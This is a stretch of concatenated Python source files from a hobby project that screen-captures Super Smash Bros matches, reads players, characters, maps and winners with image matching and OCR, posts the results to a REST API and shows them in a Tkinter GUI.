vid_cap.read() _print(f'Read frame {frame_index}: ', success) cv2.imwrite(f'frame{frame_index}.png', image) # save frame as JPEG file frame_index += 30 # @time_this def capture_screen(monitor_index=MONITOR_INDEX): with mss.mss() as sct: monitor_count = len(sct.monitors) if monitor_index > monitor_count: monitor_index = monitor_count monitor = sct.monitors[monitor_index] sct_img = sct.grab(monitor) pil_img = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX') return pil_img def capture_cards_id(): coords = COORDS['LOBBY']['CARDS_ID'] cap = capture_screen() crop = cap.crop(coords) if 'CARDS_ID' in TEMPLATES['LOBBY']: del TEMPLATES['LOBBY']['CARDS_ID'] crop.save(os.path.join(TEMPLATES_DIR, 'lobby', 'CARDS_ID.png')) TEMPLATES['LOBBY']['CARDS_ID'] = crop ##################################################################### ########################## 
IMAGE PROCESSING ######################### ##################################################################### def read_image(image, config_type='basic'): configs = { 'basic': '--psm 6 --oem 3', 'gsp': '--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789,', 'player_number': '--psm 8 --oem 3 -c tessedit_char_whitelist=p1234' } text = pytesseract.image_to_string(image, config=configs[config_type]) return text def convert_to_bw(pil_img, threshold=127, inv=True): cv_img = np.array(pil_img) try: img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY) if inv: method = cv2.THRESH_BINARY_INV else: method = cv2.THRESH_BINARY thresh, array_bw = cv2.threshold(img_gray, threshold, 255, method) pil_bw = Image.fromarray(array_bw) return pil_bw, array_bw except cv2.error: return pil_img, cv_img def find_most_similar(sample, templates, thresh=0): high_sim = ['', 0] for template_name in templates: sim = avg_sim(sample, templates[template_name]) if sim > high_sim[1]: high_sim = [template_name, sim] if thresh and sim > thresh: return high_sim return high_sim def compare_chops(sample, template, true_color=False): if sample.size == template.size: copy1 = sample.resize((64, 64)) copy2 = template.resize((64, 64)) if not true_color: copy1, arr1 = convert_to_bw(copy1) copy2, arr2 = convert_to_bw(copy2) diff = ImageChops.difference(copy1, copy2) arr = np.asarray(diff) total = 0 different = 0 for row in arr: for pixel in row: total += 1 if isinstance(pixel, (int, np.uint8)): if pixel == 255: different += 1 else: for color in pixel: different += (color / 255) sim = ((1 - (different/total)) * 100) return sim return 0 def compare_skim(sample, template, true_color=False): if sample.size == template.size: copy1 = sample.resize((64, 64)) copy2 = sample.resize((64, 64)) if not true_color: try: sample = cv2.cvtColor(np.array(sample), cv2.COLOR_BGR2GRAY) except cv2.error: sample = np.array(sample) try: template = cv2.cvtColor(np.array(template), cv2.COLOR_BGR2GRAY) except cv2.error: template = 
np.array(template) # Image is already b&w sim, diff = compare_ssim(sample, template, full=True, multichannel=True) return sim * 100 return 0 def area_sim(cap, screen, area): template = TEMPLATES[screen][area] coords = COORDS[screen][area] if not isinstance(coords[0], (list, tuple)): coords = [coords] high_sim = 0 for coord in coords: crop = cap.crop(coord) sim = avg_sim(crop, template) if sim > high_sim: high_sim = sim return high_sim def avg_sim(sample, template, true_color=False): comp_funcs = (compare_chops, compare_skim) sims = [comp_func(sample, template, true_color) for comp_func in comp_funcs] avg = sum(sims) / len(sims) return avg def match_color(pixel=None, arr=[], mode=None): best_match = ('', 0) if not mode: _print('mode required for color match') return best_match if pixel: sample = [rgb for row in np.asarray(pixel) for rgb in row][0] elif any(arr): sample = arr else: _print('no sample') return best_match colors = COLORS[mode] for color_name in colors: diff = 0 for sv, tv in zip(sample, colors[color_name]): diff += abs(sv - tv) sim = 100 - ((diff / 765) * 100) if sim > best_match[1]: best_match = (color_name, sim) return best_match def stencil(crop): w_pil, w_arr = convert_to_bw(crop, 254, inv=False) b_pil, _ = convert_to_bw(crop, 1, inv=False) b_fil = b_pil.copy() fill_border(b_fil) b_arr = np.array(b_fil) result = [] for r1, r2 in zip(w_arr, b_arr): r = [] for p1, p2 in zip(r1, r2): if int(p1) and int(p2): r.append(0) else: r.append(255) result.append(r) arr = np.array(result) img = Image.fromarray(arr.astype('uint8')) imgs = [crop, w_pil, b_pil, b_fil, img] return imgs def fill_border(img): while True: arr = np.array(img) row_count = len(arr) for row_i, row in enumerate(arr): col_count = len(row) for p_i, p in enumerate(row): if int(p): if row_i == 0 or row_i == row_count \ or p_i == 0 or p_i == col_count: ImageDraw.floodfill(img, (p_i, row_i), 0) continue break def filter_color(image, color): color = np.uint8([[color]]) hsv = cv2.cvtColor(color, 
cv2.COLOR_RGB2HSV) darker = np.array([hsv[0][0][0] - 10, 50, 50]) lighter = np.array([hsv[0][0][0] + 10, 360, 360]) image = np.asarray(image) hsv = cv2.cvtColor(image, cv2.COLOR_RGB2HSV) mask = cv2.inRange(hsv, darker, lighter) result = cv2.bitwise_and(image, image, mask=mask) return result def filter_color2(img, coords): arr = np.array(img) x, y = coords pixel = list(arr[y][x]) result = [] for row in arr: r = [] for p in row: if list(p) == pixel: r.append(255) else: r.append(0) result.append(r) return result def rgb_to_hex(rgb): return '#%02x%02x%02x' % rgb ##################################################################### ################################ MISC ############################### ##################################################################### def simplify_players(game): players = [] for team in game['teams']: color = team['color'] for player in team['players']: keys = list(player.keys()) for key in keys: if not player[key]: del player[key] if 'character_name' in player: player['character_name'] = player['character_name'].title() player['color'] = color players.append(player) return players def filter_game_data(game, mode): simple_game = {'reader_mode': mode} if mode == 1: simple_game['players'] = simplify_players(game) simple_game['map'] = game['map'] simple_game['team_mode'] = game['team_mode'] simple_game['game_mode'] = game['mode'] simple_game['cancelled'] = game['cancelled'] if mode == 2: if not game['team_mode']: simple_game['colors_changed'] = game['colors_changed'] if game['colors_changed']: for team in game['teams']: simple_game['players'] = simplify_players(game) if mode == 3: simple_game['start_time'] = -1 if mode == 4: simple_game['end_time'] = -1 if mode == 5: simple_game['winning_team'] = game['winning_color'] return simple_game def post_data(data={}): key = SETTINGS['API_KEY'] URL = SETTINGS['POST_URL'] DATA = { 'API_KEY': key, 'data': data } try: r = requests.post(url=URL, json=DATA) return r except 
requests.exceptions.ConnectionError: print('Unable to reach REST API') return None def dump_image_data(arr): filepath = os.path.join(BASE_DIR, 'img_dump.json') if os.path.isfile(filepath): with open(filepath, 'r') as infile: data = json.load(infile) else: data = [] data.append({time.time(): arr}) with open(filepath, 'w+') as outfile: json.dump(data, outfile) def clear_console(): try: none = os.system('cls') except: pass try: none = os.system('clear') except: pass def save_game_data(game): data = load_game_data() data.append(game) with open('games.json', 'w+') as outfile: json.dump(data, outfile, separators=(',',':')) def load_game_data(): path = os.path.join(BASE_DIR, 'games.json') if os.path.isfile(path): try: with open(path, 'r') as infile: return json.load(infile) except json.decoder.JSONDecodeError: pass return [] def send_command(btn): _print('PRESS', btn) os.system(f'PIGPIO_ADDR=raspberrypi.local python3 /home/badgerlord/Desktop/{btn}.py') def random_str(l=10): """Generate a random string of letters, digits and special characters """ password_characters = string.ascii_letters + string.digits return ''.join(random.choice(password_characters) for i in range(l))
Python
554
28.64621
97
/smash_reader/smash_utility.py
0.513699
0.467791
badgerlordy/smash-bros-reader
refs/heads/master
import copy import difflib import json from logger import log_exception import numpy as np import os from PIL import Image import re import smash_utility as ut import sys import threading import time sys.excepthook = log_exception character_name_debugging_enabled = False output = True def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<Game>') print(*args, **kwargs) CARD_WIDTH = 398 STOCK_SPACING = 26 with open('fighter_list.json', 'r') as infile: CHARACTER_NAMES = json.load(infile) CHARACTER_NAMES = [name.lower() for name in CHARACTER_NAMES] BASE_DIR = os.path.realpath(os.path.dirname(__file__)) CHARACTER_NAME_FIXES = { 'lemmy': 'lenny', 'lemmv': 'lenny' } MAP_NAME_FIXES = { 'Figure-S': 'Figure-8', 'HiII': 'Hill' } class ImageProcessor(threading.Thread): def __init__(self): pass class Player: def __init__(self): self.player_name_image = [] self.character_name = '' self.number = 0 self.gsp = 0 self.stock_template_image = [] self.stock_count = 0 def serialize(self, images_bool=True): _copy = copy.copy(self) img = _copy.player_name_image.tolist() for i, row in enumerate(img): img[i] = [int(bool(pixel)) for pixel in img[i]] if not images_bool: _copy.player_name_image = None _copy.stock_template_image = None else: if len(_copy.player_name_image): _copy.player_name_image = _copy.player_name_image.tolist() if len(_copy.stock_template_image): _copy.stock_template_image = _copy.stock_template_image.tolist() return _copy.__dict__ def read_card(self, card): self.get_character_name(card) self.crop_player_name(card) self.read_number(card) self.read_gsp(card) # @ut.time_this def get_character_name(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['CHARACTER_NAME']) pils = ut.stencil(crop) pil = pils[-1] template_name, sim = ut.find_most_similar(pil, ut.TEMPLATES['CHARACTER_NAMES']) if sim > 95: self.character_name = re.match('(.+)(-\d*)', template_name).group(1) else: name_as_read = ut.read_image(pil).lower() if name_as_read in 
CHARACTER_NAME_FIXES: name_as_read = CHARACTER_NAME_FIXES[name_as_read] name = difflib.get_close_matches(name_as_read, CHARACTER_NAMES, n=1) if len(name): name = name[0] if character_name_debugging_enabled: _template_name, _sim = ut.find_most_similar(pil, ut.TEMPLATES['CHARACTER_NAMES_DUMP']) if _sim < 99: num = 1 for _name in ut.TEMPLATES['CHARACTER_NAMES_DUMP']: _print(name, _name) if name in _name: num += 1 filename = f'{name}-{num}.png' path = os.path.join(BASE_DIR, 'templates', 'character_names_dump', filename) pil.save(path) self.character_name = name else: self.character_name = '...' template, sim = ut.find_most_similar(pil, ut.TEMPLATES['CHARACTER_NAMES'], thresh=95) if sim >= 95: self.character_name = template.split('-')[0] else: template, sim = ut.find_most_similar(pil, ut.TEMPLATES['UNREADABLE'], thresh=95) if sim < 95: nums = list(ut.TEMPLATES['UNREADABLE'].keys()) if len(nums): nums.sort(key=lambda num: int(num), reverse=True) num = int(nums[0]) + 1 else: num = 1 filename = f'{num}.png' ut.TEMPLATES['UNREADABLE'][num] = pil pil.save(os.path.join(ut.TEMPLATES_DIR, 'unreadable', filename)) _print(f'{name_as_read.rjust(30)} --> {self.character_name}') if False: for i, img in enumerate(pils): img.save(f'misc/character_names/{self.character_name}-{i}.png') # @ut.time_this def crop_player_name(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['NAME']) img, self.player_name_image = ut.convert_to_bw(crop, 120, False) # @ut.time_this def read_number(self, card): crop = card.crop(ut.COORDS['LOBBY']['PLAYER']['NUMBER']) # crop.save(f'{time.time()}.png') templates = {t:ut.TEMPLATES['LOBBY'][t] for t in ut.TEMPLATES['LOBBY'] if re.match('P\d+', t)} template_name, sim = ut.find_most_similar(crop, templates) num = int(os.path.splitext(template_name)[0].split('P')[1]) # pil, arr = convert_to_bw(crop, 1, False) # num = read_image(pil, 'player_number')[-1] # self.number = int(num) self.number = num # @ut.time_this def read_gsp(self, card): crop = 
card.crop(ut.COORDS['LOBBY']['PLAYER']['GSP']) text = ut.read_image(crop, 'gsp') self.gsp = int(text.replace(',', '')) class Team: def __init__(self, color): self.color = color self.players = [] self.gsp_total = 0 self.placement = '' def serialize(self, images_bool=True): players = [player.serialize(images_bool) for player in self.players] _copy = copy.copy(self) _copy.players = players return _copy.__dict__ def add_player(self, player): self.players.append(player) self.gsp_total += player.gsp class Game: def __init__(self, num=1): self.number = num self.mode = '' self.map = '' self.team_mode = False self.teams = [] self.player_count = 0 self.winning_color = '' self.start_time = 0 self.duration = 0 self.cancelled = '' self.colors_changed = False def serialize(self, images_bool=True): teams = [team.serialize(images_bool) for team in self.teams] _copy = copy.copy(self) _copy.teams = teams return _copy.__dict__ def load(self, data): self.__dict__.update(data) def read_card_screen(self, card_screen): self.read_basic_info(card_screen) self.read_cards(card_screen) @ut.time_this def read_basic_info(self, screen): crop = screen.crop(ut.COORDS['LOBBY']['GAME_INFO']) text = ut.read_image(crop) splits = text.split(' / ') self.mode = splits[0] self.map = splits[1] for map_str in MAP_NAME_FIXES: if map_str in self.map: self.map.replace(map_str, MAP_NAME_FIXES[map_str]) @ut.time_this def read_cards(self, screen): # screen.save('screen.png') id_slice = screen.crop(ut.COORDS['LOBBY']['CARDS_SLICE_IDS']) pil, cv = ut.convert_to_bw(id_slice, threshold=220, inv=False) # pil.save('slice.png') color_slice = screen.crop(ut.COORDS['LOBBY']['CARDS_SLICE_COLORS']) id_arr = np.asarray(pil) color_arr = np.asarray(color_slice) players = [] skip = 0 id_pixels = [p for row in id_arr for p in row] color_pixels = [p for row in color_arr for p in row] players = [] for i, id_pixel in enumerate(id_pixels): if skip: skip -= 1 elif id_pixel == 255: card_boundary = (i - 62, 375, i + 341, 913) crop = 
screen.crop(card_boundary) color = ut.match_color(arr=color_pixels[i - 5], mode='CARDS')[0] player = Player() player.read_card(crop) if player.character_name == '...': _print('GAME CANCELLED DUE TO UNREADABLE CHARACTER NAME') self.cancelled = 'UNREADABLE_CHARACTER_NAME' ut.send_command('b') else: players.append(player.character_name) self.player_count += 1 team = next((t for t in self.teams if t.color == color), None) if not team: team = Team(color) self.teams.append(team) team.add_player(player) skip = 340 if len(self.teams) == 2 and self.player_count > 2: self.team_mode = True elif len(set(players)) < len(players): _print('GAME CANCELLED DUE TO DUPLICATE CHARACTER IN FFA') self.cancelled = 'DUPLICATE_CHARACTER' ut.send_command('b') def read_start_screen(self, screen): time.sleep(1) screen = ut.capture_screen() if not self.team_mode and not self.cancelled: self.colors_changed = self.fix_colors(screen) if self.mode == 'Stock': # self.get_stock_templates(screen) pass elif self.mode == 'Time': pass elif self.mode == 'Stamina': pass else: _print(f'unknown mode: {self.mode}') # @ut.time_this def get_stock_templates(self, screen): stocks = [] for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: stock_template_coords = list(ut.COORDS['GAME']['PLAYER']['STOCK_TEMPLATE']) stock_template_coords[0] = edge - stock_template_coords[0] stock_template_coords[2] = edge - stock_template_coords[2] template = screen.crop(stock_template_coords) player_stock_count = 1 while True: stock_template_coords[0] += STOCK_SPACING stock_template_coords[2] += STOCK_SPACING crop = screen.crop(stock_template_coords) sim = ut.avg_sim(crop, template) if sim > 95: player_stock_count += 1 else: break def fix_colors(self, screen): info = self.get_character_details_game(screen) players = [player for team in self.teams for player in team.players] _players = copy.copy(players) _teams = [] _print('Fixing colors:') for i, character_info in enumerate(info): name, color = character_info player = 
next((p for p in players if p.character_name == name), None) team = Team(color) team.add_player(player) _teams.append(team) _print(f'\t{team.color} - {player.character_name}') for team in self.teams: color = team.color character_name = team.players[0].character_name _team = next((t for t in _teams if t.color == color), None) if not _team or _team.players[0].character_name != character_name: self.teams = _teams return True return False def get_character_templates_lobby(self, screen): characters = [] for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: char_template_coords = list(ut.COORDS['GAME']['PLAYER']['CHARACTER_TEMPLATE']) char_template_coords[0] = edge - char_template_coords[0] char_template_coords[2] = edge - char_template_coords[2] template = screen.crop(char_template_coords) template.save(f'{time.time()}.png') def get_character_templates_game(self, screen): characters = [] for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: char_template_coords = list(ut.COORDS['GAME']['PLAYER']['CHARACTER_TEMPLAT']) char_template_coords[0] = edge - char_template_coords[0] char_template_coords[2] = edge - char_template_coords[2] template = screen.crop(char_template_coords) template.save(f'{time.time()}.png') def get_character_details_game(self, screen): info = [] rerun = True while rerun: for edge in ut.COORDS['GAME']['PLAYER']['INFO'][self.player_count]: color_coords = list(ut.COORDS['GAME']['PLAYER']['COLOR']) color_coords[0] = edge - color_coords[0] color_coords[2] = edge - color_coords[2] color_pixel = screen.crop(color_coords) color, _ = ut.match_color(pixel=color_pixel, mode='GAME') char_template_coords = list(ut.COORDS['GAME']['PLAYER']['NAME']) char_template_coords[0] = edge - char_template_coords[0] char_template_coords[2] = edge - char_template_coords[2] template = screen.crop(char_template_coords) bw, _ = ut.convert_to_bw(template) name_as_read = ut.read_image(bw).lower() if name_as_read: rerun = False if name_as_read in 
CHARACTER_NAME_FIXES: name_as_read = CHARACTER_NAME_FIXES[name_as_read] name = difflib.get_close_matches(name_as_read, CHARACTER_NAMES, n=1) if len(name): _print(f'{name_as_read.rjust(30)} --> {name}') info.append((name[0], color)) else: trainer_names = ['squirtle', 'charizard', 'ivysaur'] name = difflib.get_close_matches(name_as_read, trainer_names, n=1) if len(name): info.append(('pokémon trainer', color)) else: _print(f'Can\'t read <{name_as_read}>') # template.show() # template.save(f'{time.time()}.png') else: _print(f'Can\'t read <{name_as_read}>') return info def wait_for_go(self): coords = ut.COORDS['GAME'][''] template = ut.TEMPLATES['IDS']['FIGHT_START'] screen = ut.capture_screen() crop = screen.crop(coords) while ut.avg_sim(crop, template) > 85: screen = ut.capture_screen() crop = screen.crop(coords) time.sleep(0.1) self.start_time = time.time() def read_end_screen(self, screen): pass def read_results_screen(self, screen): if self.team_mode: coords = ut.COORDS['FINAL']['VICTORY_TEAM'] templates = ut.TEMPLATES['FINAL'] crop = screen.crop(coords) sim_template = ut.find_most_similar(crop, templates) color = sim_template[0].split('_')[0] self.winning_color = color _print(self.winning_color) else: coords = ut.COORDS['FINAL'] first_place_pixel = screen.crop(coords['VICTORY_PLAYER']) self.winning_color, sim = ut.match_color(pixel=first_place_pixel, mode='RESULTS') _print(self.winning_color) team = next((t for t in self.teams if t.color == self.winning_color), None) team.placement = '1st' # print(self.serialize())
Python
419
35.646778
106
/smash_reader/smash_game.py
0.530772
0.523217
badgerlordy/smash-bros-reader
refs/heads/master
import cv2 import datetime import numpy as np import os #import pytesseract as pyt import time from datetime import datetime from PIL import Image, ImageGrab, ImageDraw, ImageChops COORDS = { 'lobby-flag-screen-id': (379, 281, 1534, 445), 'lobby-flag-screen-player-markers': (70, 820, 1800, 821), 'flag-areas': ( [(763, 528, 1156, 792)], [(472, 531, 857, 788), (1062, 531, 1447, 788)], [(327, 531, 682, 768), (782, 531, 1137, 768), (1237, 531, 1592, 768)], [(273, 540, 582, 745), (627, 540, 936, 745), (981, 540, 1290, 745), (1335, 540, 1644, 745)] ) } HOME_DIR = os.path.dirname(os.path.realpath(__file__)) FLAG_DIR = os.path.join(HOME_DIR, 'flags') ########################################################### ########################### Main ########################## ########################################################### def main(): print('Starting') flags_dir = os.path.join(HOME_DIR, 'flags') if not os.path.isdir(flags_dir): os.mkdir(flags_dir) flag_list = [] for root, dirs, files in os.walk(flags_dir): for name in files: folder_index = int(os.path.split(root)[1]) if folder_index == len(flag_list): flag_list.append([name]) else: flag_list[folder_index].append(name) cooldown = 0 notif = False while True: if cooldown: cooldown -= 1 time.sleep(1) elif is_flag_screen(): notif = False print('Flag screen detected') img = ImageGrab.grab() img.save(os.path.join(HOME_DIR, 'screen.jpg')) flags = [] cooldown = 20 count = count_markers() if count > 0: count -= 1 flag_areas = COORDS['flag-areas'][count] for i, area in enumerate(flag_areas): flag = read_flag(i, area) if not flags: flags.append(flag) else: if not any([image_similarity(flag, _flag) for _flag in flags]): flags.append(flag) for flag in flags: name = new_flag(flag, flag_list) if name: print(f'New flag: {name}') else: if not notif: print('Waiting for flag screen') notif = True time.sleep(0.01) break ########################################################### ######################### Utility ######################### 
########################################################### def time_this(func): def wrapper(*args, **kwargs): start_time = time.time() result = func(*args, **kwargs) end_time = time.time() duration = '{:.2f}'.format(end_time - start_time) print(f'function: {func.__name__} executed in {duration} seconds') return result return wrapper def new_flag(flag, flag_list): size = flag.size size_str = f'{size[0]}x{size[1]}' name = f'{size_str}.tif' if flag_list: for i, group in enumerate(flag_list): path = os.path.join(FLAG_DIR, str(i)) _flag = Image.open(os.path.join(path, group[0])) if image_similarity(_flag, flag): if name in group: return None else: group.append(name) if not os.path.isdir(path): os.mkdir(path) flag.save(os.path.join(path, name)) return f'{i}\\{name}' path = os.path.join(FLAG_DIR, str(len(flag_list))) flag_list.append([name]) if not os.path.isdir(path): os.mkdir(path) flag.save(os.path.join(path, name)) return f'{str(len(flag_list))}\\{name}' ########################################################### ########################## Image ########################## ########################################################### #@time_this def is_flag_screen(): screen_crop = ImageGrab.grab(COORDS['lobby-flag-screen-id']) img_template = Image.open(os.path.join(HOME_DIR, 'template.jpg')) if image_similarity(screen_crop, img_template): return True else: return False #@time_this def convert_to_bw(pil_img, threshold=127): cv_img = np.array(pil_img) img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY) thresh, array_bw = cv2.threshold(img_gray, threshold, 255, cv2.THRESH_BINARY_INV) pil_bw = Image.fromarray(array_bw) ImageDraw.floodfill(pil_bw, xy=(1, 1), value=0) return pil_bw, array_bw #@time_this def count_markers(): img = ImageGrab.grab(COORDS['lobby-flag-screen-player-markers']) bw_img, bw_arr = convert_to_bw(img) skip = 0 markers = 0 for i, pixel in enumerate(bw_arr[0]): if skip: skip -= 1 continue if pixel == 0: markers += 1 skip = 100 return markers #@time_this 
def read_flag(i, area): img = ImageGrab.grab(area) dt = datetime.fromtimestamp(time.time()) t = dt.strftime('%Y_%m_%d-%H.%M.%S') name = f'{t}-{i}.tif' flag_dir = os.path.join(HOME_DIR, 'flags') if not os.path.isdir(flag_dir): os.mkdir(flag_dir) return img def image_similarity(img1, img2, min_sim=90): thumb_img1 = img1.resize((64, 64)) thumb_img2 = img2.resize((64, 64)) bw1, arr1 = convert_to_bw(thumb_img1) bw2, arr2 = convert_to_bw(thumb_img2) bw1.show() bw2.show() diff = ImageChops.difference(bw1, bw2) arr = np.asarray(diff) total = 0 different = 0 for row in arr: for pixel in row: total += 1 if pixel == 255: different += 1 sim = ((1 - (different/total)) * 100) return sim > min_sim ########################################################### ######################### Launch ########################## ########################################################### if __name__ == '__main__': main()
Python
203
29.054188
99
/smash_reader/flags.py
0.476971
0.439272
badgerlordy/smash-bros-reader
refs/heads/master
from datetime import datetime import json from logger import log_exception import numpy as np import os from PIL import Image, ImageTk import platform from queue import Queue, Empty import requests import smash_game import smash_utility as ut import smash_watcher from sys import argv, excepthook import time import tkinter as tk excepthook = log_exception TITLE = 'SmashBet Screen Watcher' output = False def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<GUI>') print(*args, **kwargs) BASE_DIR = os.path.realpath(os.path.dirname(__file__)) BG = ['#282C34', '#383D48'] FG = ['#9098A6', '#9DA5B4', '#ABB3BF', '#E06C75', '#61AFEF', '#56B6C2', '#98C379'] def config_grids(widget, rows=[], columns=[]): [widget.rowconfigure(i, weight=weight) for i, weight in enumerate(rows)] [widget.columnconfigure(i, weight=weight) for i, weight in enumerate(columns)] class Menubar(tk.Menu): def __init__(self, master): super().__init__(master) self.master = master self.file_menu = tk.Menu(self, tearoff=0) # self.file_menu.add_command(label='Load State', command=self.load_state) # self.file_menu.add_command(label='Save State', command=self.save_state) # self.file_menu.add_separator() self.file_menu.add_command(label='Restart', command=self.master.restart) self.file_menu.add_command(label='Quit', command=self.master.quit) self.debug_menu = tk.Menu(self, tearoff=0) self.debug_menu.add_command(label='Clear console', command=ut.clear_console) self.output_menu = tk.Menu(self, tearoff=0) self.output_menu.add_command( label='Silence watcher', command=lambda: self.toggle_output(smash_watcher, 'watcher', 0) ) self.output_menu.add_command( label='Silence game', command=lambda: self.toggle_output(smash_game, 'game', 1) ) self.output_menu.add_command( label='Silence utility', command=lambda: self.toggle_output(ut, 'utility', 2) ) self.debug_menu.add_cascade(label='Outputs', menu=self.output_menu) self.debug_menu.add_separator() self.debug_menu.add_command(label='Print game data', 
command=lambda: print(self.master.watcher.game.serialize(images_bool=False))) self.debug_menu.add_separator() self.debug_menu.add_command(label='Capture cards_id template', command=ut.capture_cards_id) self.debug_menu.add_command(label='Character name debugging', command=self.master.character_name_debugging) self.debug_menu.add_command(label='Click spectate', command=self.master.click_spectate) self.add_cascade(label='File', menu=self.file_menu) self.add_cascade(label='Debug', menu=self.debug_menu) def toggle_output(self, module, name, index): if module.output: self.output_menu.entryconfig(index, label=f'Unsilence {name}') else: self.output_menu.entryconfig(index, label=f'Silence {name}') module.output = not module.output def load_state(self): path = os.path.join(BASE_DIR, 'game_state.json') if os.path.isfile(path): with open(path, 'r') as infile: return json.load(infile) else: return None def save_state(self): game = self.master.game if game: path = os.path.join(BASE_DIR, 'game_state.json') with open(path, 'w+') as outfile: json.dump(game, outfile) class PlayerFrame(tk.Frame): def __init__(self, master, player_info, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master self.info = player_info config_grids(self, rows=[1, 1], columns=[1, 1]) self.player_number_label = tk.Label(self, text=f'Player {self.info["number"]}', bg=self['background']) self.player_number_label.grid(row=0, column=0, sticky='nsw', padx=10) self.character_name_label = tk.Label( self, text=f'Character: {self.info["character_name"].title()}', bg=self['background'] ) self.character_name_label.grid(row=0, column=1, sticky='nsw', padx=10) self.gsp_label = tk.Label(self, text=f'GSP: {self.info["gsp"]}', bg=self['background']) self.gsp_label.grid(row=1, column=0, sticky='nsw', padx=10) arr = np.array(self.info['player_name_image']) try: img = Image.fromarray(arr.astype('uint8')) img = img.resize((200, 30), Image.NEAREST) img = img.convert('1').tobitmap() bitmap = 
ImageTk.BitmapImage(data=img) self.player_name_label = tk.Label(self, image=bitmap, bg=self.master['background']) self.player_name_label.image = bitmap self.player_name_label.grid(row=1, column=1, sticky='nw', padx=10) except TypeError: _print(arr) _print('Image data corrupted') try: ut.dump_image_data(arr) _print('Image data successfully dumped') except: _print('Failed to dump image data') class TeamFrame(tk.Frame): def __init__(self, master, team_info, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master self.info = team_info self.build_player_frames() def build_player_frames(self): COLORS = { 'RED': (252, 208, 197), 'BLUE': (163, 220, 248), 'YELLOW': (246, 237, 166), 'GREEN': (160, 235, 186) } if self.info['placement']: self.placement_label = tk.Label( self, bg=self['background'], fg=BG[0], text=f'{self.info["placement"]} place' ) self.info['players'].sort(key=lambda player: player['number']) player_frames = [] player_len = len(self.info['players']) self.gsp_label = tk.Label(self, bg=self['background'], fg=BG[0], text=f'Team GSP: {self.info["gsp_total"]}') self.gsp_label.grid(row=0, column=1, columnspan=player_len, sticky='nsw') config_grids(self, rows=[1]*(player_len+1), columns=[1, 1]) config_grids(self, rows=[0]) for i, player in enumerate(self.info['players']): hex_color = ut.rgb_to_hex(COLORS[self.info['color']]) player_frames.append(PlayerFrame(self, player, bg=hex_color)) player_frames[i].grid(row=i+1, column=0, columnspan=2, sticky='nsew', padx=10, pady=(0, 10)) class GameFrame(tk.Frame): def __init__(self, master, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master self.game_number = tk.StringVar() self.game_mode = tk.StringVar() self.game_map = tk.StringVar() self.game_duration = tk.StringVar() config_grids(self, rows=[0, 1], columns=[1]) self.info_frame = tk.Frame(self, bg=BG[0]) config_grids(self.info_frame, rows=[1, 1], columns=[1, 1]) self.info_frame.grid(row=0, column=0, sticky='nsew') 
self.game_mode_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_mode) self.game_mode_label.grid(row=0, column=0, sticky='nsew') self.game_map_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_map) self.game_map_label.grid(row=0, column=1, sticky='nsew') self.game_number_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_number) self.game_number_label.grid(row=1, column=0, sticky='nsew') self.game_duration_label = tk.Label(self.info_frame, bg=BG[0], fg=FG[0], textvariable=self.game_duration) self.game_duration_label.grid(row=1, column=1, sticky='nsew') def display_info(self): self.master.game = self.master.watcher.game.serialize() game = self.master.game self.game_number.set(f'Game #{game["number"]}') self.game_map.set(f'Map: {game["map"]}') self.game_mode.set(f'Mode: {game["mode"]}') if game['start_time']: self.game_duration.set( f'Game began {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(game["start_time"]))}' ) elif game['duration']: self.game_duration.set(f'Game completed in {game["duration"]} seconds') self.build_team_frames(game) def build_team_frames(self, game): color_order = ['RED', 'BLUE', 'YELLOW', 'GREEN'] if hasattr(self, 'teams_frame'): self.teams_frame.destroy() self.teams_frame = tk.Frame(self, bg=BG[1]) self.teams_frame.grid(row=1, column=0, sticky='nsew') team_len = len(game['teams']) config_grids(self.teams_frame, rows=[1]*team_len, columns=[1]) game['teams'].sort(key=lambda team: color_order.index(team['color'])) team_frames = [] for team_index, team in enumerate(game['teams']): hex_color = ut.rgb_to_hex(ut.COLORS['CARDS'][team['color']]) team_frames.append(TeamFrame(self.teams_frame, team, bg=hex_color)) team_frames[team_index].grid(row=team_index, column=0, sticky='nsew', pady=(0, 10)) class WatcherFrame(tk.Frame): def __init__(self, master, *args, **kwargs): super().__init__(master, *args, **kwargs) self.master = master config_grids(self, rows=[0, 0], 
columns=[1]) self.toggle_watcher_button = tk.Button( self, bg=FG[1], fg=BG[1], bd=0, text='Start watcher', command=self.toggle_watcher ) self.toggle_watcher_button.grid(row=0, column=0, sticky='ew', pady=(0, 5)) self.watcher_status = tk.Label(self, text='Watcher stopped', bg=BG[0], fg=FG[3]) self.watcher_status.grid(row=1, column=0, sticky='ew') def toggle_watcher(self): if self.master.watcher.isAlive(): # STOP self.master.watcher_queue.put('quit') self.master.watcher.join() self.toggle_watcher_button.config(text='Start watcher') self.watcher_status.config(text='Watcher stopped', fg=FG[3]) else: # START self.master.watcher = smash_watcher.Watcher(self.master.watcher_queue, self.master.queue) self.master.watcher.start() self.toggle_watcher_button.config(text='Stop watcher') self.watcher_status.config(fg=FG[6]) self.master.game_frame.destroy() self.master.game_frame = GameFrame(self.master, bg=BG[1]) self.master.game_frame.grid(row=1, column=0, sticky='nsew', padx=10, pady=10) class Window(tk.Frame): def __init__(self, master, *args, **kwargs): super().__init__(*args, **kwargs) self.master = master self.watcher = None self.cont = True self.queue = Queue() self.watcher_queue = Queue() self.character_name_debugging_enabled = False self.watcher = smash_watcher.Watcher(self.watcher_queue, self.queue) self.watcher.daemon = True self.game = None self.restart_flag = False self.pack(fill=tk.BOTH, expand=True) self.master.title(TITLE) config_grids(self, rows=[0, 1], columns=[1]) self.game_frame = GameFrame(self, 